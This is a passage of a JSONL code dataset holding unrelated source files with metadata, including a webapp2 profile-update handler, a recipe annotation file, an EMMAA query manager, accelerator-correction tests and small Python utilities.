email address cannot be changed by the user; mischief prevention\n #info.mailaddress = param['mailaddress']\n\n\n detail.leadername = param['leadername']\n detail.leadernamekana = param['leadernamekana']\n detail.sex = param['sex']\n detail.zipcode1 = param['zipcode1']\n detail.zipcode2 = param['zipcode2']\n detail.state = int(param['state']['value'])\n detail.city = param['city']\n detail.address = param['address']\n detail.building = param['building']\n detail.phone = param['phone']\n detail.website = param['website']\n\n detail.bankname = param['bankname']\n detail.bankno = param['bankno']\n detail.bankofficename = param['bankofficename']\n detail.officetype = int(param['officetype']['value'])\n detail.bankofficeno = param['bankofficeno']\n\n detail.bankaccounttype = int(param['bankaccounttype']['value'])\n detail.bankaccountno = param['bankaccountno']\n detail.bankaccountname = param['bankaccountname']\n\n info.put()\n detail.put()\n\n\n res = {'response':{'status':200},'check':True}\n\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\napp = webapp2.WSGIApplication(\n [\n ('/circle/api/mypage/index', Index),\n ('/circle/api/mypage/createuploadurl', CreateUploadUrl),\n ('/circle/api/mypage/ebooksinfomationsubmit', EbooksInfomationSubmit),\n ('/circle/api/mypage/bookstatus', BookStatus),\n ('/circle/api/mypage/feedback', FeedBack),\n ('/circle/api/mypage/bookinfomationedit', BookInfomationEdit),\n ('/circle/api/mypage/bookinfomationeditsubmit', BookInfomationEditSubmit),\n ('/circle/api/mypage/getcircleinfomationanddetail', GetCircleInfomationAndDetail),\n ('/circle/api/mypage/submitcircleinfomationanddetail', SubmitCircleInfomationAndDetail),\n ],\n debug=True,\n config=CircleLoginSessionRequestHandler.config()\n)\n\n\n","sub_path":"server/circle/api/mypage.py","file_name":"mypage.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"56586380","text":"from kitchen import kitchenState, annotatedRecipe\nfrom esdcs.groundings import PhysicalObject\n\nrecipeName=\"CAKE MIX COOKIES\"\nrecipeSource=\"http://www.cooks.com/rec/view/0,1610,130188-253193,00.html\"\ningredientsList= [(\"1 package of cake mix (any flavor)\",\n kitchenState.Ingredient(contains=[\"cake_mix\"], homogenous=True, amount=\"1 package\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(5, 1, 1, 2), lcmId=2, tags=['cake', 'mix']))),\n (\"1 large egg\", kitchenState.Ingredient(contains=[\"eggs\"], homogenous=True, amount=\"1\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['eggs']))),\n (\"1/4 cup of oil\", kitchenState.Ingredient(contains=[\"oil\"], homogenous=True, amount=\"1/4 cup\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['oil']))),\n (\"1/4 cup of water\", kitchenState.Ingredient(contains=[\"water\"], homogenous=True, amount=\"1/4 cup\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['water']))),\n (\"1 cup of chopped nuts, raisins, oatmeal, coconut, chocolate chips, etc. (anything you like in cookies)\", kitchenState.Ingredient(contains=[\"toppings\"], homogenous=True, amount=\"1 cup\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['toppings']))),\n ]\n\n\ninstructionsList = [(\"Preheat oven to 350F.\", \"preheat(350)\"),\n (\"Combine cake mix, egg, oil, and water.\", \"pour(cake_mix), pour(eggs), pour(oil), pour(water)\"),\n (\"Beat until well blended. \", \"mix()\"),\n (\"Stir in remaining ingredient (s).\", \"pour(toppings), mix()\"),\n (\"Drop by teaspoon about 1 inch apart onto greased cooke sheet.\", \"scrape()\"),\n (\"Bake for 15 minutes or until done.\", \"bake(15)\"),\n (\"Makes about 4 dozen. 
\", \"noop()\"), (\"Yummy!\", \"noop()\")]\n\nannotatedRecipeObject = annotatedRecipe.AnnotatedRecipe(recipeName, recipeSource, ingredientsList, instructionsList)\n\n\n\n","sub_path":"data/kitchen/data/cakeMixCookies.py","file_name":"cakeMixCookies.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"570176234","text":"#!/usr/bin/env python\n# vim: ai ts=4 sts=4 et sw=4\n\n##\n##\n## @author UWANTWALI ZIGAMA Didier\n## d.zigama@pivotaccess.com/zigdidier@gmail.com\n##\n\n__author__=\"Zigama Didier\"\n__date__ =\"$Nov 22, 2017 1:29:30 PM$\"\n\nfrom controller.main import RSMSRWController\nfrom model.download import Download\nimport datetime\n\nclass DownloadController(RSMSRWController):\n \n def __init__(self, navb):\n self.navb = navb\n\n def download_file(self):\n\n cnds = self.navb.conditions()\n tmn = datetime.datetime.now()\n tm = '%s_%s_%s_%s_%s_%s' % (tmn.year, tmn.month, tmn.day, tmn.hour, tmn.minute, tmn.second)\n\n export = self.navb.kw.get('export')\n name = command = description = 'export'\n msg = \"\"\n download = Download.get_by_id(self.navb.kw.get('download'))\n if export:\n if export == 'performance':\n name = 'chws_performance'\n description = 'Chws performance'\n command = 'performance'\n elif export == 'chws':\n name = 'chws_list'\n description = 'Chws list'\n command = 'chws_list'\n else:\n return msg, download\n\n filename = '%(name)s_%(tm)s_from_%(start)s_to_%(end)s.xlsx' % { 'name': name,\n 'start': self.navb.start.date(),\n 'end': self.navb.finish.date(),\n 'tm': tm\n }\n\n dwn = Download.process_download(self.navb.user, command, description = description, filename = filename,\n filters = cnds, start = self.navb.start.date(), end = self.navb.finish.date())\n if dwn:\n msg, download = (\"Export file is being processed, once done you will be able to see download link available. \", dwn)\n\n else:\n msg, download = (\"Export file failed to process. Please try again.\", None)\n\n return msg, download\n\n def get_tables(self):\n cnds = self.navb.conditions()\n cnds.update({\"(created_at) <= '%s'\" % (self.navb.finish) : ''})\n cnds.update({\"(created_at) >= '%s'\" % (self.navb.start) : ''})#;print cnds \n exts = {}\n cnds, markup, cols = self.navb.neater_tables(cnds = cnds, extras = [\n ('description', 'Description'),\n ('status', 'Status'),\n ('created_at', 'Creation Date'),\n ('filename', 'Filename'),\n ('indexcol', 'ID')\n \n ])\n\n markup.update({'indexcol': lambda x, _, __: 'Download File' % (x), })\n title, sc, group, attrs, nat, tabular, locateds, INDICS_HEADERS = ('', '', '', [], [], [],[],[])\n dcols = [x[0] for x in cols]\n cnds.update({'user_pk = %s': self.navb.user.indexcol})\n nat = Download.fetch_log_downloads(cnds, dcols)\n desc = 'Exported files list'\n \n return (title, desc, group, attrs, markup, cols, nat, tabular, locateds, INDICS_HEADERS)\n","sub_path":"src/com/rwanda/mch/controller/downloads.py","file_name":"downloads.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113699601","text":"from . 
import Config\nfrom ..helpers import pwd_prompt\nfrom librusapi import Token\nfrom librusapi.exceptions import LoginError\n\n\nclass Setup:\n \"\"\"\n All you need for the initial run of the program\n \"\"\"\n\n def __init__(self):\n self.config = Config()\n\n def begin(self):\n try:\n self.config.username = input(\"Username: \")\n except KeyboardInterrupt:\n exit(1)\n logged = False\n while not logged:\n try:\n pwd = pwd_prompt()\n except KeyboardInterrupt:\n exit(1)\n\n try:\n self.config.token = Token.get(self.config.username, pwd)\n except LoginError as ex:\n print(\"Login failed!\")\n print(f\"Username is '{self.config.username}'\")\n except Exception as ex:\n print(ex)\n exit(1)\n else:\n logged = True\n try:\n self.config.write()\n except Exception as ex:\n print(ex)\n exit(1)\n","sub_path":"pypi_install_script/libruscli-0.0.3-py3-none-any/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"467638140","text":"import logging\nimport pickle\nfrom datetime import datetime\nfrom emmaa.util import get_s3_client, make_date_str\nfrom emmaa.db import get_db\n\n\nlogger = logging.getLogger(__name__)\n\n\nmodel_manager_cache = {}\n\n\nclass QueryManager(object):\n \"\"\"Manager to run queries and interact with the database.\n\n Parameters\n ----------\n db : emmaa.db.EmmaaDatabaseManager\n An instance of a database manager to use.\n model_managers : list[emmaa.model_tests.ModelManager]\n Optional list of ModelManagers to use for running queries. If not\n given, the methods will load ModelManager from S3 when needed.\n \"\"\"\n def __init__(self, db=None, model_managers=None):\n self.db = db\n if db is None:\n self.db = get_db('primary')\n self.model_managers = model_managers if model_managers else []\n\n def answer_immediate_query(\n self, user_email, user_id, query, model_names, subscribe):\n \"\"\"First try to find a saved result for the query in the\n database and, if none is found, run the ModelManager method to answer it.\"\"\"\n # Store query in the database for future reference.\n self.db.put_queries(user_email, user_id, query, model_names, subscribe)\n # Check if the query has already been answered for any of given models\n # and retrieve the results from database.\n saved_results = self.db.get_results_from_query(query, model_names)\n if not saved_results:\n saved_results = []\n checked_models = {res[0] for res in saved_results}\n # If the query was answered for all models before, return the results.\n if checked_models == set(model_names):\n return format_results(saved_results)\n # Run queries mechanism for models for which result was not found.\n new_results = []\n new_date = datetime.now()\n for model_name in model_names:\n if model_name not in checked_models:\n mm = self.get_model_manager(model_name)\n response_list = mm.answer_query(query)\n for (mc_type, response) in response_list:\n new_results.append(\n (model_name, query, mc_type, response, new_date))\n if subscribe:\n self.db.put_results(\n model_name,\n [(query, mc_type, response)\n for mc_type, response in response_list])\n all_results = saved_results + new_results\n return format_results(all_results)\n\n def answer_registered_queries(\n self, model_name, find_delta=True, notify=False):\n \"\"\"Retrieve queries registered in the database for a given model,\n answer them, calculate the delta between results, notify users of\n any changes, and put the results into the database.\n \"\"\"\n model_manager = 
self.get_model_manager(model_name)\n queries = self.db.get_queries(model_name)\n # Only do the following steps if there are queries for this model\n if queries:\n results = model_manager.answer_queries(queries)\n new_results = [(model_name, result[0], result[1], result[2], '')\n for result in results]\n # Optionally find delta between results\n # NOTE: For now the report is presented in the logs. In future we\n # can choose some other ways to keep track of result changes.\n if find_delta:\n reports = self.make_reports_from_results(new_results, False, 'str')\n for report in reports:\n logger.info(report)\n self.db.put_results(model_name, results)\n\n def get_registered_queries(self, user_email):\n \"\"\"Get formatted results to queries registered by user.\"\"\"\n results = self.db.get_results(user_email)\n return format_results(results)\n\n def make_reports_from_results(\n self, new_results, stored=True, report_format='str'):\n \"\"\"Make a report given latest results and queries the results are for.\n\n Parameters\n ----------\n new_results : list[tuple]\n Latest results as a list of tuples where each tuple has the format\n (model_name, query, mc_type, result_json, date).\n stored : bool\n Whether the new_results are already stored in the database.\n report_format : str\n A format to write reports in. Accepted values: 'str' and 'html'.\n Returns\n -------\n reports : list[str]\n A list of reports on changes for each of the queries.\n \"\"\"\n processed_query_mc = []\n reports = []\n # If latest results are in db, retrieve the second latest\n if stored:\n order = 2\n # If latest results are not in db, retrieve the latest stored\n else:\n order = 1\n for model_name, query, mc_type, new_result_json, _ in new_results:\n if (model_name, query, mc_type) in processed_query_mc:\n continue\n try:\n old_results = self.db.get_results_from_query(\n query, [model_name], order)\n if old_results:\n for old_result in old_results:\n if mc_type == old_result[2]:\n old_result_json = old_result[3]\n if report_format == 'str':\n report = self.make_str_report_one_query(\n model_name, query, mc_type,\n new_result_json, old_result_json)\n elif report_format == 'html':\n report = self._make_html_one_query_inner(\n model_name, query, mc_type,\n new_result_json, old_result_json)\n reports.append(report)\n else:\n logger.info('No previous result was found.')\n if report_format == 'str':\n report = self.make_str_report_one_query(\n model_name, query, mc_type, new_result_json, None)\n elif report_format == 'html':\n report = self._make_html_one_query_inner(\n model_name, query, mc_type, new_result_json, None)\n reports.append(report)\n except IndexError:\n logger.info('No result for desired date back was found.')\n if report_format == 'str':\n report = self.make_str_report_one_query(\n model_name, query, mc_type, new_result_json, None)\n elif report_format == 'html':\n report = self._make_html_one_query_inner(\n model_name, query, mc_type, new_result_json, None)\n reports.append(report)\n processed_query_mc.append((model_name, query, mc_type))\n return reports\n\n def get_user_query_delta(\n self, user_email, filename='query_delta', report_format='str'):\n \"\"\"Produce a report for all query results per user in a given format.\"\"\"\n results = self.db.get_results(user_email, latest_order=1)\n if report_format == 'str':\n filename = filename + '.txt'\n self.make_str_report_per_user(results, filename=filename)\n elif report_format == 'html':\n filename = filename + '.html'\n self.make_html_report_per_user(results, 
filename=filename)\n\n def get_report_per_query(self, model_name, query):\n try:\n new_results = self.db.get_results_from_query(\n query, [model_name], latest_order=1)\n except IndexError:\n logger.info('No latest result was found.')\n return None\n return self.make_reports_from_results(new_results, True, 'str')\n\n def make_str_report_per_user(self, results, filename='query_delta.txt'):\n \"\"\"Produce a report for all query results per user in a text file.\"\"\"\n reports = self.make_reports_from_results(results, True, 'str')\n with open(filename, 'w') as f:\n for report in reports:\n f.write(report)\n\n def make_html_report_per_user(self, results, filename='query_delta.html'):\n \"\"\"Produce a report for all query results per user in an html file.\"\"\"\n msg = '<html><body>'\n reports = self.make_reports_from_results(results, True, 'html')\n for report in reports:\n msg += report\n msg += '</body></html>'\n with open(filename, 'w') as f:\n f.write(msg)\n\n def make_str_report_one_query(self, model_name, query, mc_type,\n new_result_json, old_result_json=None):\n \"\"\"Return a string message containing information about a query and any\n change in the results.\"\"\"\n if is_query_result_diff(new_result_json, old_result_json):\n if not old_result_json:\n msg = f'\\nThis is the first result to query {query} ' \\\n f'in {model_name} with {mc_type} model checker.' \\\n f'\\nThe result is:'\n msg += _process_result_to_str(new_result_json)\n else:\n msg = f'\\nA new result to query {query} in {model_name} was ' \\\n f'found with {mc_type} model checker. '\n msg += '\\nPrevious result was:'\n msg += _process_result_to_str(old_result_json)\n msg += '\\nNew result is:'\n msg += _process_result_to_str(new_result_json)\n else:\n msg = f'\\nA result to query {query} in ' \\\n f'{model_name} from {mc_type} model checker ' \\\n f'did not change. The result is:'\n msg += _process_result_to_str(new_result_json)\n return msg\n\n def make_html_one_query_report(self, model_name, query, mc_type,\n new_result_json, old_result_json=None):\n \"\"\"Return an html page containing information about a query and any\n change in the results.\"\"\"\n msg = '<html><body>'\n msg += self._make_html_one_query_inner(\n model_name, query, mc_type, new_result_json, old_result_json)\n msg += '</body></html>'\n return msg\n\n def _make_html_one_query_inner(self, model_name, query, mc_type,\n new_result_json, old_result_json=None):\n # Create an html part for one query to be used in producing html report\n if is_query_result_diff(new_result_json, old_result_json):\n if not old_result_json:\n msg = f'<p>This is the first result to query {query} in ' \\\n f'{model_name} with {mc_type} model checker. ' \\\n f'The result is:<br>'\n msg += _process_result_to_html(new_result_json)\n msg += '</p>'\n else:\n msg = f'<p>A new result to query {query} in ' \\\n f'{model_name} was found with {mc_type} ' \\\n f'model checker.<br>'\n msg += '<br>Previous result was:<br>'\n msg += _process_result_to_html(old_result_json)\n msg += '<br>New result is:<br>'\n msg += _process_result_to_html(new_result_json)\n msg += '</p>'\n else:\n msg = f'<p>A result to query {query} in ' \\\n f'{model_name} from {mc_type} model checker did not ' \\\n f'change. The result is:<br>'\n msg += _process_result_to_html(new_result_json)\n msg += '</p>'\n return msg\n\n def notify_user(\n self, user_email, model_name, query, mc_type, new_result_json,\n old_result_json=None):\n \"\"\"Create a query result delta report and send it to user.\"\"\"\n str_msg = self.make_str_report_one_query(\n model_name, query, mc_type, new_result_json, old_result_json)\n html_msg = self.make_html_one_query_report(\n model_name, query, mc_type, new_result_json, old_result_json)\n # TODO send an email to user\n pass\n\n def get_model_manager(self, model_name):\n # Try to get model manager from class attributes or load from s3.\n for mm in self.model_managers:\n if mm.model.name == model_name:\n return mm\n return load_model_manager_from_s3(model_name)\n\n def _recreate_db(self):\n self.db.drop_tables(force=True)\n self.db.create_tables()\n\n\ndef is_query_result_diff(new_result_json, old_result_json=None):\n \"\"\"Return True if there is a delta between results.\"\"\"\n # NOTE: this function is query-type specific so it may need to be\n # refactored as a method of the Query class:\n\n # Return True if this is the first result\n if not old_result_json:\n return True\n # Compare hashes of query results\n old_result_hashes = [k for k in old_result_json.keys()]\n new_result_hashes = [k for k in new_result_json.keys()]\n return not set(new_result_hashes) == set(old_result_hashes)\n\n\ndef format_results(results):\n \"\"\"Format db output to a standard json structure.\"\"\"\n formatted_results = []\n for result in results:\n formatted_result = {}\n formatted_result['model'] = result[0]\n query = result[1]\n formatted_result['query'] = _make_query_simple_dict(query)\n formatted_result['mc_type'] = result[2]\n response_json = result[3]\n response = _process_result_to_html(response_json)\n formatted_result['response'] = response\n formatted_result['date'] = make_date_str(result[4])\n formatted_results.append(formatted_result)\n return formatted_results\n\n\ndef load_model_manager_from_s3(model_name):\n model_manager = model_manager_cache.get(model_name)\n if model_manager:\n logger.info(f'Loaded model manager for {model_name} from cache.')\n return model_manager\n client = get_s3_client()\n key = f'results/{model_name}/latest_model_manager.pkl'\n logger.info(f'Loading latest model manager for {model_name} model from '\n f'S3.')\n obj = client.get_object(Bucket='emmaa', Key=key)\n body = obj['Body'].read()\n model_manager = pickle.loads(body)\n model_manager_cache[model_name] = model_manager\n return model_manager\n\n\ndef _process_result_to_str(result_json):\n # Remove the links when making text report\n msg = '\\n'\n for v in result_json.values():\n for sentence, link in v:\n msg += sentence\n return msg\n\n\ndef _process_result_to_html(result_json):\n # Make clickable links when making html report\n response_list = []\n for v in result_json.values():\n for ix, (sentence, link) in enumerate(v):\n if ix > 0:\n response_list.append('<br>')\n if link:\n response_list.append(\n f'<a href=\"{link}\">{sentence}</a>')\n else:\n response_list.append(f'{sentence}')\n response = ''.join(response_list)\n return response\n\n\ndef _make_query_simple_dict(query):\n \"\"\"Turn Query object into a simple dictionary for easier representation on\n the dashboard.\"\"\"\n query_dict = {}\n stmt = query.path_stmt\n query_dict['typeSelection'] = type(stmt).__name__\n subj, obj = stmt.agent_list()\n query_dict['subjectSelection'] = subj.name\n query_dict['objectSelection'] = obj.name\n return query_dict\n","sub_path":"emmaa/answer_queries.py","file_name":"answer_queries.py","file_ext":"py","file_size_in_byte":15809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"153055067","text":"from pathlib import Path\n\nimport numpy as np\nimport pytest\n\nfrom irnl_rdt_correction.constants import KEYWORD\nfrom irnl_rdt_correction.main import irnl_rdt_correction\nfrom tests.helpers import (\n generate_pseudo_model, generate_errortable, get_some_magnet_names,\n read_lhc_model, get_ir_magnets_mask, get_corrector_magnets_mask,\n get_opposite_sign_beam4_kl_columns,\n NAME, PLACEHOLDER, CIRCUIT, STRENGTH, IP, EPS, VALUE, MAX_N,\n)\n\n\n@pytest.mark.parametrize('order', range(3, MAX_N+1)) # 3 == Sextupole\n@pytest.mark.parametrize('orientation', ('skew', 'normal'))\n@pytest.mark.parametrize('accel', ('lhc', 'hllhc'))\ndef test_basic_correction(tmp_path: Path, order: int, orientation: str, accel: str):\n \"\"\"Tests the basic correction functionality and performs some sanity checks.\n Operates on a pseudo-model so that the corrector values are easily known.\n Sanity Checks:\n - all correctors found\n - correctors have the correct value (as set by errors or zero)\n - all corrector circuits present in madx-script\n \"\"\"\n # Parameters -----------------------------------------------------------\n if accel == 'lhc':\n if order == 5:\n pytest.skip(\"LHC has no decapole correctors\")\n if order == 6 and orientation == 'skew':\n pytest.skip(\"LHC has no skew dodecapole correctors\")\n\n orientation = \"S\" if orientation == \"skew\" else \"\"\n\n correct_ips = (1, 3)\n error_value = 2\n n_magnets = 4\n n_ips = 4\n\n n_correct_ips = len(correct_ips)\n n_sides = len(\"LR\")\n n_orientation = len([\"S\", \"\"])\n\n # Setup ----------------------------------------------------------------\n twiss = generate_pseudo_model(accel=accel, n_ips=n_ips, n_magnets=n_magnets)\n errors = generate_errortable(index=get_some_magnet_names(n_ips=n_ips, n_magnets=n_magnets))\n error_component = f\"K{order-1}{orientation}L\"\n errors[error_component] = error_value\n\n if order % 2: # order is odd -> sides have different sign in rdt\n left_hand_magnets = errors.index.str.match(r\".*L\\d$\")\n errors.loc[left_hand_magnets, error_component] = errors.loc[left_hand_magnets, error_component] / 2 # so they don't fully compensate\n\n # Correction -----------------------------------------------------------\n madx_corrections, df_corrections = irnl_rdt_correction(\n accel=accel,\n twiss=[twiss],\n errors=[errors],\n beams=[1],\n output=tmp_path / \"correct\",\n feeddown=0,\n ips=correct_ips,\n ignore_missing_columns=True,\n iterations=1,\n )\n\n # Testing --------------------------------------------------------------\n # Check output data ---\n assert len(list(tmp_path.glob(\"correct.*\"))) == 2\n\n # Check all found correctors ---\n if accel == 'lhc':\n assert len(df_corrections.index) == (\n n_orientation * n_sides * n_correct_ips * len(\"SO\") +\n n_sides * 
n_correct_ips * len(\"T\")\n )\n\n if accel == 'hllhc':\n assert len(df_corrections.index) == n_orientation * n_sides * n_correct_ips * len(\"SODT\")\n\n # All circuits in madx script ---\n for circuit in df_corrections[CIRCUIT]:\n assert circuit in madx_corrections\n\n # Check corrector values ---\n for test_order in range(3, MAX_N+1):\n for test_orientation in (\"S\", \"\"):\n for ip in correct_ips:\n mask = (\n (df_corrections[STRENGTH] == f\"K{test_order-1}{test_orientation}L\") &\n (df_corrections[IP] == ip)\n )\n if (test_order == order) and (test_orientation == orientation):\n if order % 2:\n corrector_strengths = sum(df_corrections.loc[mask, VALUE])\n assert abs(corrector_strengths) < EPS # correctors should be equally distributed\n\n corrector_strengths = -sum(df_corrections.loc[mask, VALUE].abs())\n # as beta cancels out (and is 1 anyway)\n error_strengths = n_magnets * error_value / 2 # account for partial compensation (from above)\n else:\n corrector_strengths = sum(df_corrections.loc[mask, VALUE])\n assert all(abs(df_corrections.loc[mask, VALUE] - corrector_strengths / n_sides) < EPS)\n # as beta cancels out (and is 1 anyway)\n error_strengths = (n_sides * n_magnets * error_value)\n assert abs(corrector_strengths + error_strengths) < EPS # compensation of RDT\n else:\n assert all(df_corrections.loc[mask, VALUE] == 0.)\n\n\n@pytest.mark.parametrize('beam', (1, 2, 4))\ndef test_lhc_correction(tmp_path: Path, beam: int):\n \"\"\"Test LHC optics with random errors assigned.\n Sanity Checks:\n - all correctors found\n - all correctors have a value\n - all corrector circuits present in madx-script\n \"\"\"\n # Setup ----------------------------------------------------------------\n np.random.seed(20211108)\n twiss = read_lhc_model(beam)\n mask_ir = get_ir_magnets_mask(twiss.index)\n twiss = twiss.loc[mask_ir, :]\n correctors = twiss.index[get_corrector_magnets_mask(twiss.index)]\n correct_ips = (1, 5)\n correctors = [c for c in correctors if int(c[-1]) in correct_ips]\n\n errors = generate_errortable(index=twiss.index)\n\n # here: 2 == sextupole\n errors.loc[:, [f\"K{order}{orientation}L\"\n for order in range(2, MAX_N) for orientation in (\"S\", \"\")]] = np.random.random([len(errors.index), 8])\n if beam == 4:\n negative_columns = get_opposite_sign_beam4_kl_columns(range(2, MAX_N))\n errors.loc[:, negative_columns] = -errors.loc[:, negative_columns]\n\n # Correction -----------------------------------------------------------\n madx_corrections, df_corrections = irnl_rdt_correction(\n accel='lhc',\n twiss=[twiss],\n errors=[errors],\n beams=[beam],\n output=tmp_path / \"correct\",\n feeddown=0,\n ips=correct_ips,\n ignore_missing_columns=True,\n iterations=1,\n )\n\n # Testing --------------------------------------------------------------\n # Check output data ---\n assert len(list(tmp_path.glob(\"correct.*\"))) == 2\n\n # All correctors present with a value ---\n assert len(df_corrections.index) == 2 * 2 * 5 - 1 # sides * ips * corrector orders - faulty MCOSX.3L1\n assert all(df_corrections[VALUE] != 0)\n\n found_correctors = df_corrections[NAME].to_numpy()\n for name in correctors:\n if twiss.loc[name, KEYWORD] == PLACEHOLDER:\n continue\n assert name in found_correctors\n\n # all corrector strengths are negative because all errors are positive (np.random.random)\n # this checks, that there is no sign-change between beam 1, 2 and 4.\n assert all(df_corrections[VALUE] < 0)\n\n # All circuits in madx script ---\n for circuit in df_corrections[CIRCUIT]:\n assert circuit in 
madx_corrections\n","sub_path":"tests/test_standard_correction.py","file_name":"test_standard_correction.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"647502208","text":"'''\nGiven an array nums of n integers where n > 1, \nreturn an array output such that output[i] is equal to the product of all the elements of nums except nums[i].\n\nExample:\nInput: [1,2,3,4]\nOutput: [24,12,8,6]\n\nNote: \nPlease solve it without division and in O(n).\n\nFollow up:\nCould you solve it with constant space complexity? \n(The output array does not count as extra space for the purpose of space complexity analysis.)\n'''\n\n# Solution 1: without division\nclass Solution:\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n res = [1]*len(nums) # no division used\n p = 1\n for i in range(len(nums)):\n res[i] *= p\n p *= nums[i]\n\n p = 1\n for i in range(len(nums)-1, -1, -1):\n res[i] *= p\n p *= nums[i]\n return res\n# Runtime: 88 ms, faster than 99.94% of Python3 online submissions for Product of Array Except Self.\n\n# Solution 2: with division\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n zeros = nums.count(0)\n if zeros > 1:\n return [0] * len(nums)\n prod = 1\n for i in nums: # division used below\n if i:\n prod *= i\n if zeros == 1:\n return [0 if i else prod for i in nums]\n return [prod // i for i in nums]\n","sub_path":"201-300/238. Product of Array Except Self.py","file_name":"238. Product of Array Except Self.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"570902217","text":"import json\nimport csv\nimport sys\nreload(sys); sys.setdefaultencoding('utf-8')\n\nwith open(\"test.json\") as file:\n data = json.load(file)\n\nwith open(\"data.csv\", \"w\") as file:\n csv_file = csv.writer(file)\n csv_file.writerow(\n [\"Subject\", \"Start Date\", \"Start Time\", \"End Date\", \"End Time\"])\n data = data['first']\n for item in data:\n csv_file.writerow([item.get('subject'), item.get('date'),\n item.get('time'), item.get('e_date'),\n unicode(item.get('e_time')).encode(\"utf-8\")])\n#http://int.soccerway.com/teams/ukraine/joint-stock-company-fc-shakhtar-donetsk/2254/matches/\n","sub_path":"json2csv.py","file_name":"json2csv.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"417863336","text":"#!/usr/bin/env python3\n\nimport sys\nimport fileinput\nimport re\nimport argparse\n\n\"\"\"\n this script extracts words and word alignment simultaneously from the file where the format follows the files in this directory whose extension is 'wa'\n\"\"\"\n\ndef process(buffer):\n if len(buffer)!=3:\n sys.exit(\"len(buffer) is not 3\")\n if \"rejected\" in buffer[2]:\n return \"rejected\"\n fchars = buffer[0].rstrip().split()[1:] # remove the first word \"zh:\"\n return \"\".join(fchars)\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(prog=\"./extract.py\")\n parser.add_argument(\"input\", help=\"input file\")\n args = parser.parse_args()\n with open(args.input,\"r\") as i:\n buffer = []\n for line in i:\n if line.startswith(\"#\") and len(buffer)==3:\n print(process(buffer))\n buffer = []\n elif not line.startswith(\"#\"):\n buffer.append(line)\n\n if len(buffer)==3:\n 
print(process(buffer))\n","sub_path":"extract_chinese.py","file_name":"extract_chinese.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"88199084","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/nwinter/PycharmProjects/photon_projects/photon_core/photonai/investigator/app/main/controller/hyperpipe.py\n# Compiled at: 2019-09-11 10:06:06\n# Size of source mod 2**32: 8148 bytes\nfrom flask import render_template\nfrom ..main import application\nfrom photonai.processing.results_structure import MDBHyperpipe\nfrom photonai.processing.results_handler import ResultsHandler\nfrom pymodm.errors import ValidationError, ConnectionError\nfrom ..model.Metric import Metric\nfrom ..model.BestConfigTrace import BestConfigTrace\nfrom ..model.BestConfigPlot import BestConfigPlot\nfrom ..model.PlotlyTrace import PlotlyTrace\nfrom ..model.PlotlyPlot import PlotlyPlot\nfrom .helper import load_pipe, load_available_pipes\nfrom ..model.Figures import plotly_optimizer_history, plot_scatter, plotly_confusion_matrix\n\n@application.route('/pipeline/<storage>')\ndef index_pipeline(storage):\n try:\n available_pipes = load_available_pipes()\n pipeline_list = list(MDBHyperpipe.objects.all())\n return render_template('pipeline/index.html', s=storage, pipelines=pipeline_list, available_pipes=available_pipes)\n except ValidationError as exc:\n return exc.message\n except ConnectionError as exc:\n return exc.message\n\n\n@application.route('/error/<msg>')\ndef show_error(msg):\n return render_template('default/error.html', error_msg=msg)\n\n\n@application.route('/pipeline/<storage>/<name>')\ndef show_pipeline(storage, name):\n try:\n available_pipes = load_available_pipes()\n pipe = load_pipe(storage, name)\n handler = ResultsHandler(pipe)\n config_evaluations = handler.get_config_evaluations()\n min_config_evaluations = handler.get_minimum_config_evaluations()\n optimizer_history = plotly_optimizer_history('optimizer_history', config_evaluations, min_config_evaluations, pipe.hyperpipe_info.best_config_metric)\n data_info = pipe.hyperpipe_info.data\n optimizer_info = pipe.hyperpipe_info.optimization\n cross_validation_info = pipe.hyperpipe_info.cross_validation\n best_config_plot_list = list()\n overview_plot_train = PlotlyPlot('overview_plot_training', 'Training Performance', show_legend=False)\n overview_plot_test = PlotlyPlot('overview_plot_test', 'Test Performance', show_legend=False)\n true_and_pred_val = list()\n true_and_pred_train = list()\n for fold in pipe.outer_folds:\n true_and_pred_val.append([fold.best_config.best_config_score.validation.y_true,\n fold.best_config.best_config_score.validation.y_pred])\n true_and_pred_train.append([fold.best_config.best_config_score.training.y_true,\n fold.best_config.best_config_score.training.y_pred])\n\n if pipe.hyperpipe_info.estimation_type == 'regressor':\n predictions_plot_train = plot_scatter(true_and_pred_train, 'predictions_plot_train', 'True/Pred Training')\n predictions_plot_test = plot_scatter(true_and_pred_val, 